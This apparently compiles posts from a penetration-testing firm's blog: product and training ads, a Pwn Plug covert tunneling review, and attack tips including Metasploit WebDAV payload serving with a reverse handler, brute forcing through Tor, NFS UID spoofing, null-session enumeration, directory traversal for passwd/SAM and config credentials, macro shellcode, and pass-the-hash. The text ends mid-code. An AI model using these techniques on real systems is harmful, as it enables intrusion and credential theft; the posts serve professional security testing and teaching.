There are several ways in which HERMES is already benefiting our clients and options how it may benefit you:

HERMES can be delivered as an appliance to supplement or provide your reverse engineering and incident tracking operations

HERMES can be delivered as an ESXi implementation which can fit easily into your existing virtualized environment

Finally AR can provide organizations with HERMES targeted threat intel reporting or be operated by AR staff for you. Results can be provided as a XML feed, PDF, etc.

All of this information is fed into APTSim models to ensure that ongoing testing mirrors actual current targeted attack techniques and grows in sophistication over time in sync with the attackers. This information is also used to generate your IDS, AV, Splunk, and other defensive signatures.

Rather than focusing on the entire set of malware, for which there are millions upon millions of samples, HERMES focuses on a handful of sophisticated, targeted attack tools which have been in use over the last 30 days or less. Most security tools are designed to deal with the 80% of attacks such as botnets, scans, mass malware, etc. But it's the other 20% that you should care about, because those are the ones that are intentionally (and successfully) damaging your business and that you have no defense against. This is something you can get your hands around with a tool like HERMES.

In the next post I will talk a bit more about APTSim and how it works. As always, hit up info [at] attackresearch.com for more information.

V.

We all know by now that most of today's defenses are designed to defend against auditors and penetration testers. We also know that penetration tests do not reflect what today's attackers actually do.

AR has decided to try to address this problem and change the way active defense security is currently done. This diagram roughly represents the current process.

At each stage of the current process there is a problem.

* Vendor signatures are broad and cover millions of threats, exploits and malware, causing tons of false positives, and can only detect what is broadly "known".

* Penetration testing only occurs once or twice a year and is essentially patch verification at this point.

* Patching does nothing against 0days, configuration and design flaws or lateral attack with valid credentials.

* Real attacks are not being prevented or detected and few organizations have what's needed to address the problem once they have been compromised.

* Attackers change IPs constantly; it's a solved problem for them.

* Orgs are buying every tool out there but have no qualified staff to implement and maintain them.

Here is AR's proposed process:

NOTE: We must give a nod here to Mandiant and their IOC concept, which is brilliant.

In this process HERMES covers the first three points. HERMES performs ongoing intelligence collection of APT tools and activities. HERMES also conducts automated dynamic, static, network, and forensic analysis, which in turn generates reports, indicators of compromise, and defensive signatures. Unlike other products, HERMES can use your company's standard build image for dynamic testing, so you know exactly how the threat affects your environment rather than just a stock WinXP or Win7 image. HERMES replaces much of the expensive and time-consuming reverse engineering process. AR analysts then add in notes concerning actors, victim industries, targeted data, etc. Finally, HERMES' back-end big data system provides correlation so you can see and track connections between attacks, actors, malware and IPs from a year ago and attacks today.

Once the defenses for these highly tactical, targeted IOCs have been put into place, APTSim comes into play. AR takes the tools and techniques used by APT actors and creates custom applications that do exactly what they do. We SIMULATE the exact APT attack, seen elsewhere against your colleagues and competitors, in your environment to assure you don't fall victim to it as well. These tools are run on your network on an ongoing, subscription basis rather than as a monolithic once-a-year event. AR provides your security and IT staff with frequent, small 1-3 page APTSim notifications of what was done, when, how, how it should have been detected, and all the information necessary to detect it in the future if it wasn't.
This is in stark contrast to the 40 page "here is what isn't patched" reports that traditional penetration tests generate.

All of this means that your organization is in an ongoing circular process of constantly being notified, defended and tested against up-to-the-minute APT attacks, rather than simply scanned and exploited for old memory corruption and XSS bugs. If you are an organization who has suffered losses from targeted attacks, is wrestling with staffing problems, and knows your expensive defenses have proven inadequate, this is what you have been looking for.

We've mostly utilized the 3G out-of-band functionality, which allows us to more easily bridge the gap between physical and electronic attack. Either way, it's been great and definitely a value-add for us.

:: All Pwn Plugs include aggressive reverse tunneling capabilities for persistent remote SSH access.

:: All tunnels are encrypted via SSH and will maintain access wherever the plug has an Internet connection.

:: The following covert tunneling options are available for traversing strict firewall rules & application-aware IPS:

SSH over any TCP port

SSH over HTTP requests (appears as standard HTTP traffic)

SSH over SSL (appears as HTTPS)

SSH over DNS queries (appears as DNS traffic)

SSH over ICMP (appears as outbound pings)


SSH Egress Buster (top 10 common egress ports)

Out-of-band SSH over 3G/GSM cellular (Elite models)

Yak yak, let's see some action shots!

First some shots of the web interface to set up the various tunnels (taken from the web site)

It's pretty straightforward, and the documentation the Pwnie Express guys provide will get you up and running with whatever tunnel method you choose.

OK, now action shots.

Pwn Plug hanging out in an empty cube hooked up to the network

With the 3G stick plugged in (sorry, kinda blurry, couldn't go back and take another ;-/).

Final placement behind some boxes, where it hung out for a few days.

We are going to be releasing a few blog posts on our thoughts on why we have to better communicate what works in actually securing something! This first post is on why we created our new class, Offensive Techniques.

With all the "APT" hype, 0day discussions, and endless numbers of intrusions, we were having a hard time not screaming at the IT industry to pull its head out! Our good friend Dino Dai Zovi hit the nail on the head of why we created the Offensive Techniques class. He did this with a couple of tweets that read "Oh, I see what you have been doing all of this time. Solving problems that don't exist while ignoring the real ones in front of your face." Followed shortly by, "For example: defending against pen tests and security researchers instead of actual attacks and attackers. How's that working out for you?"

Countless times we have either conducted a test or an incident response for a business that was decimated by some type of targeted attack. The techniques used, by either us or the attacker, are usually not what is being taught in traditional penetration testing classes in the industry. The attack didn't involve Nessus or some other vulnerability scanner. The attackers usually didn't even use nmap (they used a batch file with a for loop and ping/netcat as a quick port scanner). The attacks combined deep operating-system-level knowledge to circumvent misconfigurations, some good custom tools, and even Metasploit! So why is it, with the rise in IT security spending, that we see little progression in defending against and detecting attacks that are not pulled off by a trained pen tester? It is because we don't train or watch for these types of attacks, and we never have. They have been going on for decades, not just the past 5 years or so. Take a look at the regulations on companies/organizations in relation to securing data.
The regulations are just a checkbox game, and the results of these regulations really don't improve security that much, if at all. You can implement everything from NIST 800-53 and we will still get in and wreak havoc! Organizations and companies are too bogged down with bureaucracy to adapt as fast as they need to. We have to change the cultural mindset of mid-to-senior-level executives, politicians, and even some system administrators. Offensive Techniques teaches how to really conduct offensive cyber operations, not auditor-based attacks. Offensive Techniques is one of many Attack Research classes designed to help change how we go about actually providing organizations/companies with real threat-based/vulnerability-based results on how they are truly vulnerable. It teaches the fundamentals of how to conduct real attacks. We are debuting the class in October at Countermeasures 2012, but will be holding a class in the United States in November (more details to come on that). If you are interested in this or any other of our trainings, reach out and send us an email at training@attackresearch.com

Debut of Offensive Techniques: We have completely overhauled our Tactical Exploitation class for Blackhat, and are now getting ready to debut a new course at Countermeasure 2012 (http://www.countermeasure2012.com/) titled Offensive Techniques (http://www.countermeasure2012.com/training-ot.html).

Offensive Techniques is designed to show students how to truly conduct offensive cyber operations on networks. In our current day of "APT" and targeted attacks, companies often don't understand how they are vulnerable to these types of attacks. Targeted attacks can be carried out by individuals as well as nation states, and Offensive Techniques is designed to teach students how to really conduct these types of operations. We increasingly see many "pen-testing" shops disappoint a customer with a report about how many shells they got, but not about how vulnerable their business is to someone actually coming after them in a targeted manner.

The class is designed to work a student through compromising a fully operational enterprise Windows and Unix network with techniques perfected by Attack Research. We will be releasing more courses in the near future, ranging from secure system administration to offensive and defensive classes. If you are interested in Offensive Techniques or other courses, drop us a line at training@attackresearch.com

The module is in the trunk. You can read the post, but in my experience newer versions of Lotus Domino don't actually advertise that they are Lotus Domino in the banner, so you need a way to identify these and, once identified, figure out the current version so you can see if there are any exploits for it.

One of the other things Bill mentions is locating these vulnerable pages. He uses Google dorks, which is useful as long as the site is indexed. While not in the trunk, a while back I had a bunch of Domino servers on a pentest. I ended up taking all the Domino scanners I could find, combining their wordlists into one wordlist, and writing a Metasploit module to search for those URLs. The key was that we wanted to see which ones were open to the world, which ones required authentication (correct behavior), and any that forwarded you somewhere else (probably because you are on 80 and the site requires 443).
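The triage boils down to bucketing each URL by the HTTP status code it returns. A minimal Ruby sketch of that classification logic (not the actual module code):

```ruby
# Bucket a response status the way the scan described above does:
# world-readable, auth required (correct behavior), or bounced elsewhere.
def classify_response(status)
  case status
  when 200      then :open           # page served to the world
  when 401, 403 then :auth_required  # correct behavior
  when 301, 302 then :redirected     # likely forwarded (e.g. 80 -> 443)
  else               :other
  end
end
```

In the real module you would feed this the status of each wordlist URL and report only the `:open` hits.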

The current module does not allow you to download EXEs; in fact, these are specifically blacklisted. This makes sense because that's not what the exploit is for. Anyway, someone asked me if it was possible to download a file (specifically a pre-generated EXE) over WebDAV. I know an auxiliary module to act as a WebDAV server has been a request for a while, but it looked like the dll_hijacker module could accomplish it. I added a block of code to the process_get function to handle the EXE and then removed .exe from the blacklist.

So if LOCALEXE is set to TRUE, serve up the local EXE at the path/filename you specify; if not, generate an executable based on the payload options (yes, I realize AV will essentially make this part useless).
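In sketch form, the branch looks something like this (the option names match the module's datastore, but the method and variables here are illustrative, not the module's actual code):

```ruby
# Pick the EXE bytes to serve: either the pre-generated binary at
# LOCALROOT/LOCALFILE, or the one built from the payload options.
def exe_to_serve(datastore, generated_exe)
  if datastore['LOCALEXE']
    File.binread(File.join(datastore['LOCALROOT'], datastore['LOCALFILE']))
  else
    generated_exe
  end
end
```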

The below is a "show options" with nothing set. The default is to generate an EXE payload; if you want to serve your own local EXE you need to set LOCALEXE to TRUE.

msf exploit(webdav_file_server) > show options

Module options (exploit/windows/dev/webdav_file_server):

Name        Current Setting  Required  Description
----        ---------------  --------  -----------
BASENAME    policy           yes       The base name for the listed files.
EXTENSIONS  txt              yes       The list of extensions to generate
LOCALEXE    false            yes       Use a local exe instead of generating one based on payload options
LOCALFILE   myexe.exe        yes       The filename to serve up
LOCALROOT   /tmp/            yes       The local file path
SHARENAME   documents        yes       The name of the top-level share.
SRVHOST     0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT     80               yes       The daemon port to listen on (do not change)
SSLCert                      no        Path to a custom SSL certificate (default is randomly generated)
URIPATH     /                yes       The URI to use (do not change).

[*] Exploit running as background job.
[*] Started reverse handler on 192.168.26.129:5555
[*]
[*] Exploit links are now available at \\192.168.26.129\documents\
[*]
[*] Using URL: http://0.0.0.0:80/
[*] Local IP: http://192.168.26.129:80/
[*] Server started.

Say you need to brute force something. Many devices (like Juniper SSL VPNs) will tell you to go to hell if you throw too many failed attempts at them too quickly. That sux.

I regularly use Intruder to do my brute forcing for me, especially since you can add timing options.

You can intercept your request, send it to Intruder, then add a payload marker for the username (and password if you want to do username/username).

Setting the payload spots

So if you just want to iterate through a list of usernames with the same pass, you just set the pass, then go to payloads and add your userlist. Above, I'm doing username with username-as-the-password, using the pitchfork attack type. (I think Ken has gone over this in depth, so I'll stop explaining all that unless people ask for it.)

Our list of usernames

Once that is set up, you can play with timing options from the Options tab. This will adjust the number of threads and how long to wait in between requests.

Timing options

You may also want to send everything through Tor. Check the Burp main Options tab.

-CG

"Trace.axd is an Http Handler for .Net that can be used to view the trace details for an application. This file resides in the application's root directory. A request to this file through a browser displays the trace log of the last n requests in time-order, where n is an integer determined by the value set by requestLimit="[n]" in the application's configuration file."

http://www.ucertify.com/article/what-is-traceaxd.html

It is a separate file to store tracing messages. If you have pageOutput set to true, your webpage will acquire a large table at the bottom. That will list lots of information—the trace information. trace.axd allows you to see traces on a separate page, which is always named trace.axd.

http://www.dotnetperls.com/trace

Open NFS mounts/shares are awesome. Talk about sometimes finding "the goods". More than once an organization has been backing up everyone's home directories to an NFS share with bad permissions, so checking to see what's shared and what you can access is important.

Low? Currently an "info" with Nessus 5.

Anyway, you probably want to know about finding it. You have a few options.

To mount an NFS share, use the following after first creating a directory on your local machine:

[root@attacker~]# mount -t nfs 192.168.0.1:/export/home /tmp/badperms

Change directories to /tmp/badperms and you should see the contents of /export/home on 192.168.0.1. To abuse NFS further, you can check out the rest from http://www.vulnerabilityassessment.co.uk/nfs.htm; it talks about tricking NFS into letting you become other users. I'm going to put it here in case it goes missing later:

"You ask now, how do you circumvent file permissions and the use of the sticky bit? This is done with a little prior planning and sleight of hand to confuse the remote machine.

If we have a /export/home/dave directory that we have gone into, we will see a number of files belonging to dave, some or all of which you may be able to read. The one thing the system will give you is the owner's UID on the remote system after issuing an ls -al command, i.e.

-rwxr----- 517 wheel 898 daves_secret_doc

The permissions at the moment do not let you do anything with the file as you are not the owner (yet) and not a member of the group wheel.

Move away from the mount point and unmount the share:

umount /local_dir

Create a user called dave:

useradd dave
passwd dave

Edit /etc/passwd and change the UID to 517

Remount the share as local root

Go into dave's directory:

cd dave

Issue the command:

su dave

As you are local root you can do this and as you have an account called dave you will not need a password

Now the quirky stuff - as the UID of your local account dave matches the username and UID of the remote dave, the remote system now thinks you're his dave. Hey presto, you can now do whatever you want with daves_secret_doc."

Valsmith and hdmoore gave their Tactical Exploitation talk at DEF CON 15 and talked about NFS (file services section of the slides): video, white paper. They also gave it at Blackhat in a much longer format; unfortunately the video is broken into multiple 14-minute parts, so go Google for it (lazy).

The first post talks about executing shellcode and gives the calc.exe example. These examples work on x64 and x86. Yay! The second post talks about doing something more than calc.exe... getting shell. Whooo hooooo.

You can review the code, but it only shows x86/32-bit shellcode. This will fail miserably on x64.

I initially thought it would be an easy fix: just grab an x64 payload from MSF. Problem is, there are no x64 http/https payloads...

CG was a sad panda.

This left me with two options:

Suck it up and use an existing x64 payload (like rev_tcp), or just pop calc.exe to prove how awesome I am during pentests.

You will need to set the execution policy for v1.0 powershell, or possibly try a bypass technique.

I ended up adding this to Nicolas' code before it started doing its thing (line 24). It detects if it's not x86 and just runs the shellcode with the x86 PowerShell. You'll have to set the execution policy for it first.

UPDATE - An easier way to do this can be found on our update post here

Android periodically updates its SDK, and sometimes when this happens, old methods for importing a trusted CA, necessary to proxy SSL traffic, will fail and you must find a new solution. Technically speaking, it's not necessarily the import that is the problem; it's saving those changes between restarts of the emulator. If you've worked with the emulator you'll note that after importing a trusted CA such as BurpSuite's certificate, the changes only take effect once you've rebooted the emulator. In other words, you actually have to restart the emulator, and without these steps, you'll lose your updated trusted CA list.

Using Android SDK 19, the solution was to move a temporary file and rename it. Let's begin:

The reason this data persisted is that we moved the temporary copy (emulator-<random string>) from /tmp/android-<myname>/ and renamed it to system.img. Lastly, we placed the image file in the ~/.android/avd/test.avd/ directory.

Man, I love misconfigured WebDAV; I have put a foot in many a network's ass with a writable WebDAV server. Like the browsable directories thing, it's *usually* not writable, but it occurs often enough that you really have to make sure you check it each time you see it.

LOW?

IIS5 is awesome (not) because WebDAV is enabled by default, but the web root is not writable. Wait, who still runs Windows 2000?! I know, I know... the app can't be rewritten... accepted risk... blah blah... no one will ever use this to pwn my network... it's OK if that DA admin script logs into it daily...

The "game" is finding the writable directory (if one exists) on the WebDAV enabled server. *Dirbusting and ruby FTW*

I find that it's usually NOT the web root, so honestly it can be a challenge to find the writable directory. VA scanners can help; Nessus will actually tell you the methods allowed per directory... still a challenge though.

Null sessions are old school. They used to be useful against pretty much every host in a domain. Unfortunately, I very rarely run into an environment where all workstations let you connect anonymously AND get data.

Where they can still come in useful:

Against mis-configured servers

Against domain controllers to pull info

Low? Actually a medium...

More than once I've had a PT where a master browser was exposed to the Internet. We were able to connect to the server using rpcclient and enumerate users. After that we had a full list of the users in the domain to conduct external brute-forcing attacks with.

If you like pretty pictures, it kinda looks like this; there are command line utilities as well...

Cain uses null sessions by default to try to pull information. On modern systems this will fail.

But domain controllers/master browsers do allow this, so if you find yourself in a position to be able to speak with one, you can get a list of users for the domain.
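For example, rpcclient -U "" -N <dc-ip> -c enumdomusers (a null session, no password) spits out lines like user:[jsmith] rid:[0x451]. A small Ruby sketch to reduce that output to a bare username list for the brute forcing step:

```ruby
# Extract bare usernames from rpcclient enumdomusers output, where each
# line looks like: user:[jsmith] rid:[0x451]
def usernames_from_enumdomusers(output)
  output.scan(/^user:\[([^\]]*)\]/).flatten
end
```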

You can then take that list of users and run brute force attacks against various services. I rarely fail to find at least one username/username pair in an environment.

"Index of" can be your friend, and the same goes for "web mirroring". Unfortunately, and also to the point of the talk/series, you have to go look at this crap. It's *usually* not important: stuff like the /icons/ directory in Apache.

But every now and then pure gold will show up, so you have to go look at it.

LOW?

So, some examples of browsable directories that were not /icons/ :-)

Yeah yeah, but real world?! So, story time: we were doing a PT, and the site had SQL injection, so we were able to pull down lots of data, but the sensitive stuff was *encrypted*, so we were kinda stuck. Poking around further we found a directory with indexing enabled. What was there? A database backup and a site backup with the decryptMe PHP function along with the current encryption key :-) All from a "low" vulnerability.

Sometimes, even though the deployer functionality is password protected, the server-status may not be.

/web-console/status?full=true

/manager/status/all

LOW?

This can be useful to find:

Lists of applications

Recent URLs accessed

sometimes with sessionids

Find hidden services/apps

Enabled servlets

owned stuff :-)

Finding 0wned stuff is always fun. Let's see...

Looking at the list of applications, one stands out as not looking normal (zecmd). Following that down leads us to zecmd.jsp, which is a JSP shell. If you are interested in zecmd.jsp and the JBoss worm it comes from --> this is a good write-up, as is this OWASP preso: https://www.owasp.org/images/a/a9/OWASP3011_Luca.pdf

Thoughts?

-CG

The slides were published here and the video from hashdays is here, no video for BSides ATL.

I consistently violate presentation zen and I try to make my slides usable after the talk but I decided to do a few blog posts covering the topics I put in the talk anyway.

Post [1] Exposed Services and Admin Interfaces

Exposed Services:

An example of exposed services and making sure you check for default and common passwords. The first example is a VNC server with no password. This gives us a HIGH severity finding.

The following is a VNC server with a password of "password". See the problem? The same thing goes for SSH, Telnet, FTP, etc. Don't forget about databases as well: MS SQL, MySQL, Oracle, Postgres listening out to the Internet at large.

Admin Interfaces:

Admin interfaces can be gold. The problem is 1) you have to find them on the random-ass port they are running on and 2) you have to get eyes on them. This can be a hassle/problem/hard to do.

So, to bring the "low" to it: some random HTTP server gets you this in Nessus.

Now, to be fair, this could be totally accurate, but the point is you need to look at what is being served on this HTTP server. Could be something, could be nothing; no way to know unless you look. Finding useful HTTP pages on all the random ports can be challenging.

Here is a possible methodology for doing it:

Nmap your range

Import your nmap results into metasploit

Use the db_ searches to pull out a list of hosts & ports

With the magic of scripting languages make that list into an html page(s)

Kinda goes like this: after you have imported your nmap results, use the services option. If it's populated you'll get a list of results like the below. Output that stuff to a CSV:

msf > services -o /tmp/demo.csv

Take that CSV and run some ruby on it
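A minimal Ruby sketch of that conversion (the column names assume Metasploit's services CSV header, and the input/output paths are illustrative; adjust both to your export):

```ruby
require 'csv'

# Turn a Metasploit "services -o" CSV into a page of clickable links,
# one per host:port, so you can eyeball each HTTP(S) service.
def services_csv_to_html(csv_text)
  links = CSV.parse(csv_text, headers: true).map do |row|
    scheme = row['port'] == '443' ? 'https' : 'http'
    url = "#{scheme}://#{row['host']}:#{row['port']}/"
    %(<a href="#{url}" target="_blank">#{url}</a><br/>)
  end
  "<html><body>\n#{links.join("\n")}\n</body></html>\n"
end

# Hypothetical paths: read the msf export, write the clickable page.
if File.exist?('/tmp/demo.csv')
  File.write('links.html', services_csv_to_html(File.read('/tmp/demo.csv')))
end
```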

The above code will output an html file that you can open with linky. linky will open each link in a new tab, giving you a way to get eyes on each of those random HTTP(S) services. You can now start intelligently trying default passwords or viewing exposed content.

The slides were published here and the video from hashdays is here, no video for BSides ATL.

I consistently violate presentation zen and I try to make my slides usable after the talk but I decided to do a few blog posts covering the topics I put in the talk anyway.

Post [0] Intro/The point of the talk (sorry no pics of msf or courier new font in this one):

I had several points (I think...maybe all the same point...whatever)

1. We tend to have an over-reliance on vulnerability scanners to tell us everything that is vulnerable. To be honest, I have been guilty of this myself. Most of us probably have, for a variety of reasons: time, experience, level of effort required/paid for, etc. This over-reliance on scanners has led to "no highs" == "secure environment". Most of us know this is not *always* the case, and the point of the talk was to show some examples where medium and low vulnerabilities have led to further exploitation or impact that I would consider "high" or above. Whether you call them chained exploits, magic, or the natural evolution of taking multiple smaller vulnerabilities and turning them into a significant exploit or opportunity, it's becoming more normal/common to have to go this route.

2. Given the "no highs" == "secure environment" mentality, some clients have been conditioned to believe that anything that is not a high is not exploitable and therefore not a priority for fixing (sometimes ever). This of course is not the outcome most people would recommend. Nevertheless, some people take that approach.

3. How many IDS/IPS signatures exist for low and medium vulns, and how often do we ignore/disable those? Feedback welcome here.

4. Clients should pay attention to low/medium vulns as much as they do high+ vulns, and in turn pentesters/VA people/security teams should also pay attention to low/medium vulns. Does that mean every "SSLv2 enabled" finding should be a full-out emergency? Hell no, but *someone* needs to be able to vet that those low/medium findings can't be turned into something more.

5. Keep a human in the mix. Tools/scanners are great for automating tasks, but I don't think we are there yet with the technology for taking multiple less severe vulnerabilities and turning them into something significant. Bottom line: the scanner won't find all your ownable stuff; you need a person (or people) to do this.

I'll be giving my ColdFusion for Pentesters talk at SOURCE Boston next week.

Here is the info from the abstract:

"ColdFusion is one of those technologies where organizations are either ColdFusion shops or they won't touch it on a bet. Similarly, I find that pentesters have either been exposed to it and have a few tricks to attack it or not. Aside from common web application issues, ColdFusion can also be attacked on the network level and many times used to obtain remote access on the host. This talk will cover what is ColdFusion, common ColdFusion issues, finding useful ColdFusion URLs, identifying specific ColdFusion version and components, and verifying if common vulnerabilities are present in the ColdFusion server you are targeting. If access to the ColdFusion administrative interface can be obtained, you can perform post exploitation activities that will typically yield you remote access to the operating system supporting the ColdFusion install."

Like the other talks, I'll do the what-it-is, why you care (?), and some ways to go after it. Hopefully useful/interesting.

In July I published an article on Abusing Password Resets. Some Ruby code was provided, and it no longer works very well. Gmail has a limitation on POP3 message retrieval; long story short, you can only get around 250 emails. This is pretty annoying when you want to pull down thousands of password reset emails to analyze the plain-text passwords for entropy. So the solution is to use IMAP. Here is that code:

Breakdown:

Lines 1-3 - Start the script in Ruby, require the necessary libs

Lines 6, 8 - Name the class and instantiate a placeholder for the file (could have been done with an instance variable as well).

Lines 10-11 - Method invoked (def initialize) when the class is started, self.lfile is the location of the file we will store our emails in.

Line 14 - Instantiate a connection string to Gmail's IMAP server, name it "imap".

Line 16-17 - Provide creds and invoke the check_for_emails method

Lines 24, 33 - Define the check_for_emails method, take the imap object as input, and close ("end") the method.

Lines 25-26 - Select the inbox as the folder to pilfer and then instantiate a msgs object which holds the results of all messages that haven't been deleted.

Lines 27-32 - If "msgs" (Array) is empty, print a message saying so; otherwise print that we are grabbing emails and invoke the place_emails_into_files method with both the msgs and imap objects.

Lines 35, 44 - define the method (place_emails_into_file) and close it off.

Lines 37-38 - Fetch the message with the message id (mid) we have created and then chomp any extra space off the end.

Lines 39-41 - Open the emails.txt file in the inbox folder (you've hopefully created) and write the message body into it (appending, NOT overwriting).

Line 43 - Invoke the create_file_with_tokens method.

Lines 46, 56 - define the create_file_with_tokens method and then close it.

Lines 47-49 - Create a new file which will contain the string you are trying to extract (the password) and then open the 'inbox/emails.txt' file for reading. Finally, on line 49 start iterating thru each line of the read_file ('inbox/emails.txt').

Lines 50-51 - Match the string you are looking for, if the m object (result of the match) is of a MatchData type, then put that string (password) into the "tokens.txt" or new_file, file.

Lines 53-55 - Close both files and print that we are done.

This should be able to run in Ruby versions 1.8.7 and greater. Ensure that you put your username and password in place of the ones I've entered on line 16.
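The matching step in create_file_with_tokens is just a regex pass over the saved mail. As a standalone sketch (the "Your new password is:" line format is hypothetical; match whatever your target's reset emails actually contain):

```ruby
# Scan saved email bodies for a reset-password line and collect the
# values, the way create_file_with_tokens does before writing tokens.txt.
# The line format here is an assumption -- adjust the regex to your mail.
def extract_tokens(email_text)
  email_text.each_line.map { |line|
    m = line.match(/Your new password is:\s*(\S+)/)
    m && m[1]
  }.compact
end
```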

In cktricky's last post he provided a great outline on the ins and outs of leveraging Burp's built-in support for directory traversal testing. There are two questions, however, that should immediately come to mind once you are familiar with this tool: how do I find directory traversal, and what should I look for if I do?

Finding directory traversal is the hunt for dynamic file retrieval or modification. The antonym, static file retrieval, is when the browser is delegated the request for a file on the server. In other words, every <a href>, CSS call for a file/location, and even most JavaScript calls can be considered static. You could copy the path of those requests into the browser address bar and grab the file yourself, because that is pretty much what the browser is doing for you. Dynamic file retrieval, however, is when you request a server-based page/function which serves you a file. Think of it as the difference between calling someone directly on the phone vs. calling an operator who calls that person and patches you in.

Dynamic file serving takes place for a variety of reasons, such as: user content download locations, dynamic image rendering/resizing features, template engines, language parameters*, AJAX-to-services type calls, sometimes in cookies, and occasionally in how pages themselves get served. These all basically look something like: somefunction.php?img=/some/place/graphic.jpg or somefunction.php?page=/view/something

The path to the file can either be relative (../../../etc) or, in some rarer cases, absolute (c:/windows/boot.ini). Additionally, these requests might be base64 or ROT13 encoded, or sometimes encrypted. Neither is a showstopper.

You might think language parameters are an odd location for directory traversal, but after talking with my co-workers*, they reminded me about dynamic file modification. Some frameworks use parameters (such as language) to prefix a directory to the request or alter the file name for the appropriate language. Ergo:

Language, template/skin name, or occasionally environment type variables (such as location=PROD, DEBUG, etc...). Anything that might be prefixed to a file name or directory to search is fair-game for that.
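When one of these parameters turns out to be base64-encoded, your traversal payload has to be wrapped the same way before you substitute it in; for example, in Ruby:

```ruby
require 'base64'

# Wrap a traversal payload the way a base64-encoded parameter expects.
payload = '../../../etc/passwd'
encoded = Base64.strict_encode64(payload)   # value to drop into the parameter
decoded = Base64.strict_decode64(encoded)   # round-trip sanity check
```

The same idea applies to ROT13 or whatever encoding the app uses: encode your payload, not the literal dots and slashes.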

Now what?

Once you've identified a location which appears to be ripe for testing, how do you verify, and what would you do? To verify, I have found two approaches that work well: default files & known files.

The first approach is based on looking for default files on the file system. Since you are mostly blind to what exists on a server, you look for the existence of these defaults to see if they can be retrieved. There are two resources which I've found helpful. The first is Mubix's list of post-exploitation commands. In addition to a helpful list of commands for post exploit, the list includes very common files you might want to look for and steal (by operating system). The second resource is the Apache default layout per OS. This can be really useful if you are attacking a system using Apache, to grab known configurations. For non-Apache web servers, I usually install them locally and see what the default layout looks like manually.

The second approach comes into play if the first fails (and it might) because the user-context of the site doesn't have the authority to access those files. So you have to request files you can be reasonably sure it has access to: the webpages it already serves. In this approach you attempt to serve other parts of the webpage, relative to the location you are currently looking at. As a contrived example, say you see a layout something like:

/mainpage.asp
/vulnerableFeature.asp?path=/images/some-image.jpg

you'd test for:

/vulnerableFeature.asp?path=../mainpage.asp
/vulnerableFeature.asp?path=/mainpage.asp

Since you know that the user-context of the site has the authority to serve those pages, it -should- be a fairly practical way to verify that your directory traversal is working. You may even get back source code this way. :-)

If you are attempting to take over the server, you should be looking to steal resources which would help you with that (such as the passwd & SAM files).
If you are attempting to do an involuntary code review, you should steal the source code of the pages you are looking at. There are occasionally hard-coded credentials in source, but application configuration files are often gold for credentials. I've found database, admin-user, SMTP, and FTP credentials this way.
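The known-files check lends itself to quick scripting: build a list of traversal candidates relative to the vulnerable parameter and request each one. A minimal sketch below reuses the contrived example above; the base URL, parameter name, and known page are hypothetical stand-ins for whatever the target exposes.

```python
import urllib.parse

# Hypothetical vulnerable endpoint and a page we know the site serves
BASE = "http://target.example/vulnerableFeature.asp"
KNOWN_PAGE = "mainpage.asp"

def candidate_urls(depths=3):
    """Build traversal candidates relative to the current location."""
    # Absolute-style reference first, then increasing ../ depths
    urls = [BASE + "?path=/" + KNOWN_PAGE]
    for d in range(1, depths + 1):
        payload = "../" * d + KNOWN_PAGE
        urls.append(BASE + "?path=" + urllib.parse.quote(payload))
    return urls

for u in candidate_urls():
    print(u)
```

Feed each URL to your HTTP client of choice and diff the responses against the known page; a match means the traversal is working.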

Some final things to consider:

Most operating systems support the use of environment variables/shortcuts for locations such as %home% or ~. This is useful to remember if there are protections against using a period or two successive periods.

When dynamic features serve files, they often violate other protections. In IIS, for instance, various extensions cannot be served by the server (.config files, for example). However, in most directory traversals you can pull the web.config file out w/o many problems.

User-controlled uploads often get served dynamically because there isn't a way for the server to know beforehand what the files are. You can sometimes find directory traversal here by uploading files with weird paths in their names (or renaming them after upload).

Developers sometimes leave clues to files' physical locations in comments. I once downloaded the source for an entire site because of this.

Often, I'll use Burp Suite's directory traversal Intruder payload list. One extra step must be performed to effectively leverage the traversal payloads; we'll briefly cover it.

Intruder with the insertion point (fuzzing the file parameter)

Burp's fuzzing-path traversal payload list, available under the preset list payload set, has a placeholder, "{FILE}", that represents the filename you'd like to fuzz for. This placeholder must be substituted with an actual filename (e.g. /etc/passwd).

As you can see, the additional step was adding a payload processing rule. We chose match/replace, escaped the characters that have meaning in regular expressions (the curly braces {}) by placing a backslash in front of them, and replaced the placeholder with etc/passwd.

Lastly, don't forget to select/deselect the URL-encoding of characters based on your needs.
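The substitution the payload processing rule performs is trivial to reproduce outside Burp if you ever want to pre-bake a list. The sample payloads below are illustrative, not the full Burp list:

```python
# A few representative traversal payloads with Burp's "{FILE}" placeholder
payloads = [
    "../{FILE}",
    "../../{FILE}",
    "..%2f..%2f{FILE}",
    "....//....//{FILE}",
]

target = "etc/passwd"

# Equivalent of the Intruder match/replace processing rule
resolved = [p.replace("{FILE}", target) for p in payloads]

for p in resolved:
    print(p)
```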

scriptjunkie recently had a post on direct shellcode execution in MS Office macros. I didn't see it go into the Metasploit trunk, but it's there. How to generate the macro code is in the post, but I'll repost it here so I don't have to go looking for it elsewhere later. He even has a sample to start with so you can see how it works. Just enable the Developer tab, then hit the Visual Basic button to change the code around.

The important thing to remember is that with this method you will NOT be dropping a .vbs or .bin, and you'll be running inside of Excel/Word/whatever, so you need to make sure you set up an autorunscript or macro to migrate out of the process, else you'll lose the shell as soon as they exit the Office application.

I ended up having to use the smb/upload_file module on a pentest. I was able to get the local admin hashes, but for some reason the psexec module wouldn't get code execution; it would act like it worked but didn't. So we decided to push a binary and use a winexe modified to pass the hash to exec the binary as needed. It went something like this...

#################################################
# add a route to the 10.x network thru session 1
#################################################

######################################################
# psexec wouldnt work. AV eating metsvc most likely...
# used smb/upload_file to place a binary on the box
######################################################
msf exploit(handler) > use auxiliary/admin/smb/upload_file
msf auxiliary(upload_file) > info

Name      Current Setting  Required  Description
----      ---------------  --------  -----------
LPATH                      yes       The path of the local file to upload
RHOST                      yes       The target address
RPATH                      yes       The name of the remote file relative to the share
RPORT     445              yes       Set the SMB service port
SMBSHARE  C$               yes       The name of a writeable share on the server

Description: This module uploads a file to a target share and path. The only reason to use this module is if your existing SMB client is not able to support the features of the Metasploit Framework that you need, like pass-the-hash authentication.

###################################################################
# Use winexe with pass the hash to get cmd shell and run the binary
###################################################################
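The glue between the hashdump output and the pass-the-hash winexe call is just string munging, and it's easy to get the field order wrong under pressure. A small sketch follows; the pth-winexe invocation syntax shown is an assumption based on the patched winexe builds floating around, and the host and binary path are hypothetical.

```python
def parse_pwdump(line):
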